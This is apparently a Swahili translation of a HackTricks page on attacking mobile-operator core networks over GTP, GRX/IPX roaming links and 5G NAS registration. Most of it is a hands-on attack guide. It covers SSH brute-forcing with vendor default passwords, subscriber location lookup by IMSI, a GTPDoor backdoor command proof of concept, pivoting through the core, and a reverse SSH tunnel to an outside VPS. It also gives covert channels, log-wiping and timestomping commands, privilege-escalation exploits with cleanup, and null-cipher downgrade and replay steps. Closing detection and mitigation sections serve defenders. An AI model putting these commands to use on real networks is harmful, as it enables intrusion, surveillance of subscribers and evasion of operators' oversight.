12 KiB
Telecom Network Exploitation (GTP / Roaming Environments)
{{#include ../../banners/hacktricks-training.md}}
Note
Itifaki za core za simu (GPRS Tunnelling Protocol – GTP) mara nyingi hupitia semi-trusted GRX/IPX roaming backbones. Kwa kuwa zinaendeshwa juu ya plain UDP na karibu bila uthibitishaji, ufikiaji wowote ndani ya mipaka ya telecom mara nyingi unaweza kufikia moja kwa moja signalling planes za core. Maelezo yafuatayo yanakusanya mbinu za kushambulia zilizoonekana katika mazingira ya vitani dhidi ya SGSN/GGSN, PGW/SGW na nodes nyingine za EPC.
1. Recon & Initial Access
1.1 Default OSS / NE Accounts
Seti kubwa kwa kushangaza ya elementi za mtandao kutoka kwa wauzaji huja na watumiaji waliowekwa imara wa SSH/Telnet kama root:admin, dbadmin:dbadmin, cacti:cacti, ftpuser:ftpuser, … wordlist maalum huongeza kwa kiasi kikubwa mafanikio ya brute-force:
hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt
Ikiwa kifaa kinaonyesha tu management VRF, pivot kupitia jump host kwanza (tazama sehemu «SGSN Emu Tunnel» hapa chini).
1.2 Ugundaji wa Host ndani ya GRX/IPX
Wengi wa operatori wa GRX bado wanaruhusu ICMP echo kupita kwenye backbone. Changanya masscan na probes za UDP zilizojengwa gtpv1 ili kwa haraka ramani ya GTP-C listeners:
masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
2. Kuorodhesha Abonati – cordscan
Chombo cha Go kilicho hapa kinatengeneza vifurushi vya GTP-C Create PDP Context Request na kurekodi majibu. Kila jibu linafunua SGSN / MME ya sasa inayohudumia IMSI iliyoulizwa na, wakati mwingine, PLMN iliyotembelewa na abonati.
# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap
Bendera muhimu:
--imsiIMSI ya mteja lengwa--operHome / HNI (MCC+MNC)-wAndika paketi ghafi kwenye pcap
Konstanti muhimu ndani ya binary zinaweza kubadilishwa ili kupanua skani:
pingtimeout = 3 // seconds before giving up
pco = 0x218080
common_tcp_ports = "22,23,80,443,8080"
3. Utekelezaji wa Msimbo kupitia GTP – GTPDoor
GTPDoor ni huduma ndogo ya ELF ambayo binds UDP 2123 and parses every incoming GTP-C packet. Wakati payload inaanza na pre-shared tag, sehemu iliyobaki ina-decrypted (AES-128-CBC) na inatekelezwa kupitia /bin/sh -c. stdout/stderr hu-exfiltrate ndani ya ujumbe za Echo Response ili hakuna outward session kamwe isiundwe.
Minimal PoC packet (Python):
import gtpc, Crypto.Cipher.AES as AES
key = b"SixteenByteKey!"
cmd = b"id;uname -a"
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))
Ugunduzi:
- yoyote mwenyeji anayetuma unbalanced Echo Requests kwa anwani za IP za SGSN
- bendera ya toleo la GTP imewekwa kwa 1 wakati aina ya ujumbe = 1 (Echo) – utofauti na spec
4. Pivoting Through the Core
4.1 sgsnemu + SOCKS5
OsmoGGSN inakuja na emulator ya SGSN inayoweza kuanzisha muktadha wa PDP kuelekea GGSN/PGW halisi. Baada ya kukubaliana, Linux hupokea interface mpya tun0 inayoweza kufikiwa kutoka kwa roaming peer.
sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
-APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 & # internal SOCKS proxy
Kwa hair-pinning sahihi ya firewall, tundu hili linapita kando ya signalling-only VLANs na linakupeleka moja kwa moja kwenye safu ya data.
4.2 SSH Reverse Tunnel over Port 53
DNS huwa wazi karibu kila mara katika miundombinu za roaming. Fungua huduma ya ndani ya SSH kwenye VPS yako ikisikiliza kwenye :53 na urudi baadaye kutoka nyumbani:
ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com
Hakikisha kwamba GatewayPorts yes imewezeshwa kwenye VPS.
5. Covert Channels
| Channel | Transport | Decoding | Notes |
|---|---|---|---|
ICMP – EchoBackdoor |
ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | msikilizaji wa kimyakimya kabisa, hakuna trafiki ya kutoka |
DNS – NoDepDNS |
UDP 53 | XOR (key = funnyAndHappy) encoded in A-record octets |
inatazama *.nodep sub-domain |
GTP – GTPDoor |
UDP 2123 | AES-128-CBC blob in private IE | inaingiliana na mazungumzo halali ya GTP-C chatter |
All implants implement watchdogs that timestomp their binaries and re-spawn if crashed.
6. Defense Evasion Cheatsheet
# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp
# Disable bash history
export HISTFILE=/dev/null
# Masquerade as kernel thread
echo 0 > /proc/$$/autogroup # hide from top/htop
printf '\0' > /proc/$$/comm # appears as [kworker/1]
touch -r /usr/bin/time /usr/bin/chargen # timestomp
setenforce 0 # disable SELinux
7. Privilege Escalation kwenye Legacy NE
# DirtyCow – CVE-2016-5195
gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd
# PwnKit – CVE-2021-4034
python3 PwnKit.py
# Sudo Baron Samedit – CVE-2021-3156
python3 exploit_userspec.py
Dokezo la kusafisha:
userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c
8. Zana
cordscan,GTPDoor,EchoBackdoor,NoDepDNS– custom tooling described in previous sections.FScan: msako wa TCP kwenye intranet (fscan -p 22,80,443 10.0.0.0/24)Responder: LLMNR/NBT-NS rogue WPADMicrosocks+ProxyChains: pivoting nyepesi ya SOCKS5FRP(≥0.37) : traversal ya NAT / kuunganisha asset
9. Mashambulizi ya Usajili wa 5G NAS: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay
Mchakato wa usajili wa 5G unaendeshwa juu ya NAS (Non-Access Stratum) juu ya NGAP. Hadi usalama wa NAS uanzishwe kwa Security Mode Command/Complete, ujumbe za awali hazijathibitishwa wala hazijafichwa. Dirisha hili kabla ya usalama huruhusu njia mbalimbali za mashambulizi wakati unaweza kuangalia au kuharibu trafiki ya N2 (mf., on-path ndani ya core, rogue gNB, au testbed).
Mtiririko wa usajili (imefupishwa):
- Registration Request: UE inatuma SUCI (SUPI iliyofichwa) na capabilities.
- Authentication: AMF/AUSF inatuma RAND/AUTN; UE inarejesha RES*.
- Security Mode Command/Complete: NAS integrity na ciphering vinajadiliwa na kuanzishwa.
- PDU Session Establishment: usanidi wa IP/QoS.
Vidokezo vya usanidi wa maabara (si-RF):
- Core: Open5GS default deployment inatosha kuzalisha mtiririko.
- UE: simulator au UE ya majaribio; decode kwa kutumia Wireshark.
- Active tooling: 5GReplay (capture/modify/replay NAS within NGAP), Sni5Gect (sniff/patch/inject NAS on the fly without bringing up a full rogue gNB).
- Filters muhimu za kuonyesha katika Wireshark:
- ngap.procedure_code == 15 (InitialUEMessage)
- nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request)
9.1 Faragha ya kitambulisho: SUCI failures exposing SUPI/IMSI
Inatarajiwa: UE/USIM lazima itume SUCI (SUPI iliyofichwa kwa funguo za umma za mtandao wa nyumbani). Kupata SUPI/IMSI wazi ndani ya Registration Request inaonyesha dosari ya faragha inayowezesha kufuatilia mteja kwa muda mrefu.
Jinsi ya kujaribu:
- Kamata ujumbe wa kwanza wa NAS katika InitialUEMessage na chunguza Mobile Identity IE.
- Ukaguzi wa haraka kwenye Wireshark:
- Inapaswa ku-decode kama SUCI, sio IMSI.
- Filter examples:
nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suciinapaswa kuwepo; kutokuwepo pamoja na uwepo waimsikunaonyesha kuvuja.
Nini kukusanya:
- MCC/MNC/MSIN ikiwa imetolewa; rejea kwa kila-UE na fuatilia kwa muda/mahali.
Kupunguza:
- Lazimisha UEs/USIMs zenye SUCI pekee; toa tahadhari juu ya IMSI/SUPI yoyote katika NAS ya mwanzo.
9.2 Kupunguza uwezo (capability bidding-down) hadi algoritmu tupu (EEA0/EIA0)
Mandhari:
- UE inatangaza EEA (encryption) na EIA (integrity) zinazotunukiwa katika UE Security Capability IE ya Registration Request.
- Ramani za kawaida: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 ni algoritmu tupu (null).
Tatizo:
- Kwa sababu Registration Request haijalindwa kwa integriti, mshambuliaji aliye on-path anaweza kufuta bits za capability ili kulazimisha uchaguzi wa EEA0/EIA0 baadaye wakati wa Security Mode Command. Baadhi ya stacks kwa makosa huruhusu algoritmu tupu nje ya huduma za dharura.
Hatua za kushambulia:
- Intercept InitialUEMessage na badilisha NAS UE Security Capability ili kutangaza tu EEA0/EIA0.
- Kwa Sni5Gect, hook ujumbe wa NAS na patch bits za capability kabla ya kuendelea.
- Angalia kama AMF inakubali null ciphers/integrity na inakamilisha Security Mode kwa EEA0/EIA0.
Uhakiki/uwazi:
- Katika Wireshark, thibitisha algoritmu zilizochaguliwa baada ya Security Mode Command/Complete.
- Mfano wa output ya passive sniffer:
Encyrption in use [EEA0]
Integrity in use [EIA0, EIA1, EIA2]
SUPI (MCC+MNC+MSIN) 9997000000001
Mikakati (zinazohitajika):
- Sanidi AMF/policy kukataa EEA0/EIA0 isipokuwa pale inapotakiwa kwa lazima (kwa mfano, simu za dharura).
- Pendelea kutekeleza EEA2/EIA2 kama kiwango cha chini; rekodi na toa alarm kwa muktadha wowote wa usalama wa NAS unaojadiliana kuhusu null algorithms.
9.3 Replay ya initial Registration Request (pre-security NAS)
Kwa sababu initial NAS haina uadilifu na freshness, InitialUEMessage+Registration Request iliyokamatwa inaweza kureplayed kwa AMF.
PoC rule for 5GReplay to forward matching replays:
<beginning>
<property value="THEN"
property_id="101"
type_property="FORWARD"
description="Forward InitialUEMessage with Registration Request">
<!-- Trigger on NGAP InitialUEMessage (procedureCode == 15) -->
<event value="COMPUTE"
event_id="1"
description="Trigger: InitialUEMessage"
boolean_expression="ngap.procedure_code == 15"/>
<!-- Context match on NAS Registration Request (message_type == 65) -->
<event value="COMPUTE"
event_id="2"
description="Context: Registration Request"
boolean_expression="nas_5g.message_type == 65"/>
</property>
</beginning>
Kitu cha kuangalia:
- Je, AMF inakubali replay na kuendelea na Authentication; ukosefu wa uhakiki wa uhalisia au wa muktadha unaonyesha hatari.
Marekebisho:
- Lazimisha replay protection/context binding kwenye AMF; rate-limit na correlate kwa kila GNB/UE.
9.4 Vidokezo vya zana (inayoweza kurudiwa)
- Open5GS: anzisha AMF/SMF/UPF kuiga core; tazama N2 (NGAP) na NAS.
- Wireshark: thibitisha ufasiri wa NGAP/NAS; tumia filters zilizo juu ili kutenganisha Registration.
- 5GReplay: rekodi registration, kisha replay ujumbe maalum za NGAP + NAS kama sheria inavyoeleza.
- Sni5Gect: sniff/modify/inject NAS control-plane kwa moja kwa moja ili kulazimisha null algorithms au kuingilia authentication sequences.
9.5 Orodha ya ulinzi
- Endelea kuchunguza Registration Request kwa plaintext SUPI/IMSI; zuia vifaa/USIMs vinavyokiuka.
- Kataa EEA0/EIA0 isipokuwa kwa taratibu za dharura zilizobainishwa kwa ukomo; hitaji angalau EEA2/EIA2.
- Gundua miundombinu haribifu au iliyopangwa vibaya: unauthorized gNB/AMF, unexpected N2 peers.
- Toa onyo kuhusu NAS security modes zinazosababisha null algorithms au replay mara kwa mara ya InitialUEMessage.
Mawazo ya Ugunduzi
- Kifaa chochote isipokuwa SGSN/GGSN kinachounda Create PDP Context Requests.
- Porti zisizo za kawaida (53, 80, 443) zinapokea SSH handshakes kutoka IP za ndani.
- Echo Requests mara kwa mara bila Echo Responses zinazolingana – inaweza kuonyesha GTPDoor beacons.
- Kiwango kikubwa cha trafiki ya ICMP echo-reply iliyo na uwanja mkubwa wa identifier/sequence usio sifuri.
- 5G: InitialUEMessage inayobeba NAS Registration Requests zinazorudiwa kutoka vituo sawa (ishara ya replay).
- 5G: NAS Security Mode inayojadili EEA0/EIA0 nje ya muktadha wa dharura.
Marejeo
- Palo Alto Unit42 – Infiltration of Global Telecom Networks
- 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0)
- 3GPP TS 29.281 – GTPv2-C (v17.6.0)
- Demystifying 5G Security: Understanding the Registration Protocol
- 3GPP TS 24.501 – Non-Access-Stratum (NAS) protocol for 5GS
- 3GPP TS 33.501 – Security architecture and procedures for 5G System
{{#include ../../banners/hacktricks-training.md}}